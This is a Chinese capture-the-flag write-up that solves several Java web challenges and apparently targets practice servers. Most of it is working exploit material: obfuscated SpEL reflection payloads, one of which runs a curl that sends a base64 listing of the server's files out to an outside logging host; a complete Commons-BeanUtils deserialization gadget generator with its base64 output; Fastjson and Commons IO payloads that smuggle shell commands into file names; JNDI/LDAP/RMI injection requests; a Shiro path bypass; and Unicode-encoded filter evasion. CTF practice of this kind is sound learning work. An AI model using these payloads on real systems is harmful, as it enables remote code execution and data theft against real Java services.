跳跳糖
0x00 Code-Breaking Puzzles — javacon
知识点:java反射+SpEL注入
文章:
http://rui0.cn/archives/1015
Spring 表达式语言 (SpEL):
http://itmyhome.com/spring/expressions.html
有一个黑名单:
自己写了个:SmallEvaluationContext类 这里我还没写过Spring 不是很懂这里意思!
payload:
String.class.getClass().forName("java.l"+"ang.Ru"+"ntime").getMethod("exec",String.class).invoke(String.class.getClass().forName("java.l"+"ang.Ru"+"ntime").getMethod("getRu"+"ntime").invoke(String.class.getClass().forName("java.l"+"ang.Ru"+"ntime")),"curl http://fg5hme.ceye.io/1aa1k");
System.out.println(Encryptor.encrypt("c0dehack1nghere1", "0123456789abcdef", "#{T(String).getClass().forName(\"java.l\"+\"ang.Ru\"+\"ntime\").getMethod(\"ex\"+\"ec\",T(String[])).invoke(T(String).getClass().forName(\"java.l\"+\"ang.Ru\"+\"ntime\").getMethod(\"getRu\"+\"ntime\").invoke(T(String).getClass().forName(\"java.l\"+\"ang.Ru\"+\"ntime\")),new String[]{\"/bin/bash\",\"-c\",\"curl fg5hme.ceye.io/`cd / && ls|base64|tr '\\n' '-'`\"})}"));
#{T(String).getClass().forName(\"java.l\"+\"ang.Ru\"+\"ntime\").getMethod(\"ex\"+\"ec\",T(String[])).invoke(T(String).getClass().forName(\"java.l\"+\"ang.Ru\"+\"ntime\").getMethod(\"getRu\"+\"ntime\").invoke(T(String).getClass().forName(\"java.l\"+\"ang.Ru\"+\"ntime\")),new String[]{\"calc\"})}
题目地址:
0x01 深育杯
文章:
https://xz.aliyun.com/t/10533
Web-log
知识点:CB无依赖RCE
有以前的日志!下载下来!
有个反序列化 cb链就行 注意版本 而且不能用cc! 学习文章:
https://www.leavesongs.com/PENETRATION/commons-beanutils-without-commons-collections.html
exp
package com.ctf.upload;
/**
* Created by upload on 2021/11/17.
*/
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import javassist.ClassPool;
import javassist.CtClass;
import org.apache.commons.beanutils.BeanComparator;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.Base64;
import java.util.PriorityQueue;
public class test {
public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
Field field = obj.getClass().getDeclaredField(fieldName);
field.setAccessible(true);
field.set(obj, value);
}
public byte[] getPayload(byte[] clazzBytes) throws Exception {
TemplatesImpl obj = new TemplatesImpl();
setFieldValue(obj, "_bytecodes", new byte[][]{clazzBytes});
setFieldValue(obj, "_name", "HelloTemplatesImpl");
setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());
final BeanComparator comparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER);
final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);
// stub data for replacement later
queue.add("1");
queue.add("1");
setFieldValue(comparator, "property", "outputProperties");
setFieldValue(queue, "queue", new Object[]{obj, obj});
// ==================
// 生成序列化字符串
ByteArrayOutputStream barr = new ByteArrayOutputStream();
ObjectOutputStream oos = new ObjectOutputStream(barr);
oos.writeObject(queue);
oos.close();
return barr.toByteArray();
}
public static void main(String[] args) throws Exception{
ClassPool pool = ClassPool.getDefault();
CtClass clazz = pool.get(eval.class.getName());
byte[] payloads = new test().getPayload(clazz.toBytecode());
String p = Base64.getEncoder().encodeToString(payloads);
System.out.println(p);
}
}
package com.ctf.upload;
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import java.io.IOException;
public class eval extends AbstractTranslet{
@Override
public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
}
@Override
public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
}
public eval() throws IOException {
Runtime.getRuntime().exec("calc");
}
public String toString(){
return "";
}
}
payload
user=rO0ABXNyABdqYXZhLnV0aWwuUHJpb3JpdHlRdWV1ZZTaMLT7P4KxAwACSQAEc2l6ZUwACmNvbXBhcmF0b3J0ABZMamF2YS91dGlsL0NvbXBhcmF0b3I7eHAAAAACc3IAK29yZy5hcGFjaGUuY29tbW9ucy5iZWFudXRpbHMuQmVhbkNvbXBhcmF0b3LPjgGC/k7xfgIAAkwACmNvbXBhcmF0b3JxAH4AAUwACHByb3BlcnR5dAASTGphdmEvbGFuZy9TdHJpbmc7eHBzcgAqamF2YS5sYW5nLlN0cmluZyRDYXNlSW5zZW5zaXRpdmVDb21wYXJhdG9ydwNcfVxQ5c4CAAB4cHQAEG91dHB1dFByb3BlcnRpZXN3BAAAAANzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3QAEltMamF2YS9sYW5nL0NsYXNzO0wABV9uYW1lcQB+AARMABFfb3V0cHV0UHJvcGVydGllc3QAFkxqYXZhL3V0aWwvUHJvcGVydGllczt4cAAAAAD/////dXIAA1tbQkv9GRVnZ9s3AgAAeHAAAAABdXIAAltCrPMX+AYIVOACAAB4cAAABafK/rq+AAAANAAwCgAHACEKACIAIwgAJAoAIgAlCAAmBwAnBwAoAQAJdHJhbnNmb3JtAQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABVMY29tL2N0Zi91cGxvYWQvZXZhbDsBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcAKQEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAGPGluaXQ+AQADKClWBwAqAQAIdG9TdHJpbmcBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAAlldmFsLmphdmEMABoAGwcAKwwALAAtAQAEY2FsYwwALgAvAQAAAQATY29tL2N0Zi91cGxvYWQvZXZhbAEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQBADljb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvVHJhbnNsZXRFeGNlcHRpb24BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwAhAAYABwAAAAAABAABAAgACQACAAoAAAA/AAAAAwAAAAGxAAAAAgALAAAABgABAAAAEQAMAAAAIAADAAAAAQANAA4AAAAAAAEADwAQAAEAAAABABEAEgACABMAAAAEAAEAFAABAAgAFQACAAoAAABJAAAABAAAAAGxAAAAAgALAAAABgABAAAAFgAMAAAAKgAEAAAAAQANAA4AAAAAAAEADwAQAAEAAAABABYAFwACAAAAAQAYABkAAwATAAAABAABABQAAQAaABsAAgAKAAAAQAACAAEAAAAOKrcAAbgAAhIDtgAEV7EAAAACAAsAAAAOAAMAAAAYAAQAGQANABoADAAAAAwAAQAAAA4ADQAOAAAAEwAAAAQAAQAcAAEAHQAeAAEACgAAAC0AAQABAAAAAxIFsAAAAAIACwAAAAYAAQAAAB0ADAAAAAwAAQAAAAMADQAOAAAAAQAfAAAAAgAgcHQAEkhlbGxvVGVtcGxhdGVzSW1wbHB3AQB4cQB+AA14
题目地址:
还是你熟悉的fastjson吗
知识点:Fastjson 1.2.68 反序列化漏洞 Commons IO 2.x 写文件利用
文章:https://mp.weixin.qq.com/s/6fHJ7s6Xo4GEdEGpKFLOyg
看了文章我们实操一下:
hello路由下可以解析json数据
copy下留有后门:
怎么控制文件名呢!
copy路由的意思是获取/tmp/下的文件和目录
如果文件以.8.bak结尾!可以执行bash命令!
bash -c cp$IFS/tmp/aaa.8.bak$IFS/tmp/aaa.8
aaa;ls;$IFS.8.bak
bash -c cp$IFS/tmp/aaa;命令;$IFS.8.bak$IFS/tmp/aaa.8
bash -c cp$IFS/tmp/aaa;calc;$IFS.8.bak$IFS/tmp/aaa.8
bash -c cp$IFS/tmp/aaa;curl 0.0.0.0:1;#$IFS.8.bak$IFS/tmp/
payload
{
"x":{
"@type":"com.alibaba.fastjson.JSONObject",
"input":{
"@type":"java.lang.AutoCloseable",
"@type":"org.apache.commons.io.input.ReaderInputStream",
"reader":{
"@type":"org.apache.commons.io.input.CharSequenceReader",
"charSequence":{"@type":"java.lang.String""a*8200"
},
"charsetName":"UTF-8",
"bufferSize":1024
},
"branch":{
"@type":"java.lang.AutoCloseable",
"@type":"org.apache.commons.io.output.WriterOutputStream",
"writer":{
"@type":"org.apache.commons.io.output.FileWriterWithEncoding",
"file":"/tmp/aaa;curl${IFS}0.0.0.0:1;#$IFS.8.bak",
"encoding":"UTF-8",
"append": false
},
"charsetName":"UTF-8",
"bufferSize": 1024,
"writeImmediately": true
},
"trigger":{
"@type":"java.lang.AutoCloseable",
"@type":"org.apache.commons.io.input.XmlStreamReader",
"is":{
"@type":"org.apache.commons.io.input.TeeInputStream",
"input":{
"$ref":"$.input"
},
"branch":{
"$ref":"$.branch"
},
"closeBranch": true
},
"httpContentType":"text/xml",
"lenient":false,
"defaultEncoding":"UTF-8"
},
"trigger2":{
"@type":"java.lang.AutoCloseable",
"@type":"org.apache.commons.io.input.XmlStreamReader",
"is":{
"@type":"org.apache.commons.io.input.TeeInputStream",
"input":{
"$ref":"$.input"
},
"branch":{
"$ref":"$.branch"
},
"closeBranch": true
},
"httpContentType":"text/xml",
"lenient":false,
"defaultEncoding":"UTF-8"
},
"trigger3":{
"@type":"java.lang.AutoCloseable",
"@type":"org.apache.commons.io.input.XmlStreamReader",
"is":{
"@type":"org.apache.commons.io.input.TeeInputStream",
"input":{
"$ref":"$.input"
},
"branch":{
"$ref":"$.branch"
},
"closeBranch": true
},
"httpContentType":"text/xml",
"lenient":false,
"defaultEncoding":"UTF-8"
}
}
}
执行payload:
aaa;curl<>0.0.0.0:1;#$IFS.8.bak
上面那个测试过发现不行!
aaa;curl\${IFS}0.0.0.0:1;#$IFS.8.bak
题目地址:
0x02 香山杯
easy_fastjson
知识点:fastjson 反序列化漏洞
文章:https://www.freebuf.com/vuls/279465.html
payload:
POST / HTTP/1.1
Host: scy.upload.love:8080
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: OUTFOX_SEARCH_USER_ID_NCOO=404551432.11568177
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 394
payload={%20%20%20%20%20"a":{%20%20%20%20%20%20%20%20%20"@type":"java.lang.Class",%20%20%20%20%20%20%20%20%20"val":"com.sun.rowset.JdbcRowSetImpl"%20%20%20%20%20},%20%20%20%20%20"b":{%20%20%20%20%20%20%20%20%20"@type":"com.sun.rowset.JdbcRowSetImpl",%20%20%20%20%20%20%20%20%20"dataSourceName":"ldap://0.0.0.0:1/badNameClass",%20%20%20%20%20%20%20%20%20"autoCommit":true%20%20%20%20%20}%20}
下载 JNDI-Injection-Exploit 工具,执行如下命令搭建ldap服务:
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "curl 0.0.0.0:1" -A "服务器"
如过有过滤:
使用Unicode编码绕过:
CODE
payload={"e":{"\u0040\u0074\u0079\u0070\u0065":"\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073","\u0076\u0061\u006c":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0065\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0074\u0049\u006d\u0070\u006c"},"name":{"\u0040\u0074\u0079\u0070\u0065":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0065\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0074\u0049\u006d\u0070\u006c","\u0064\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\u004e\u0061\u006d\u0065":"rmi://0.0.0.0:1099/sx8cow","\u0061\u0075\u0074\u006f\u0043\u006f\u006d\u006d\u0069\u0074":true}}
题目地址:
0x03 祥云杯2021
层层穿透
知识点:fastjson 反序列化漏洞
有过滤:
16进制和unicode编码过滤了! 还过滤了两个类!
先绕过shiro
文章:https://blog.csdn.net/qq_41832837/article/details/109064636
POST /fdsf;/../admin/test HTTP/1.1
Host: scy.upload.love:8080
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: OUTFOX_SEARCH_USER_ID_NCOO=404551432.11568177; JSESSIONID=FED138EBCA6C0C2785D2FA5F4705755B
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 10
json=11111
payload:
{"@type":"com.mchange.v2.c3p0.JndiRefForwardingDataSource","jndiName":"rmi://0.0.0.0:1099/mklnof","loginTimeout":0,"f":"a*20000"}
题目地址:
0x04 常用命令
java -jar challeng.jar
netstat -ano|findstr 8080
taskkill /f /t /im 9035
F7步入|F8步过|F9到下一个断点|ALT+F8评估表达式|Ctrl+F 文件内查找字符串|双击Shift 查找任何内容,可搜索类、资源、配置项、方法等,还能搜索路径|Ctrl + N 按类名搜索类|Ctrl + F12 查看当前类结构|Ctrl + H 查看类的层次关系|Alt + F7 查找类或方法在哪被使用
0x05 题目链接
题目已上传Github
以后继续写👾👾👾👾👾
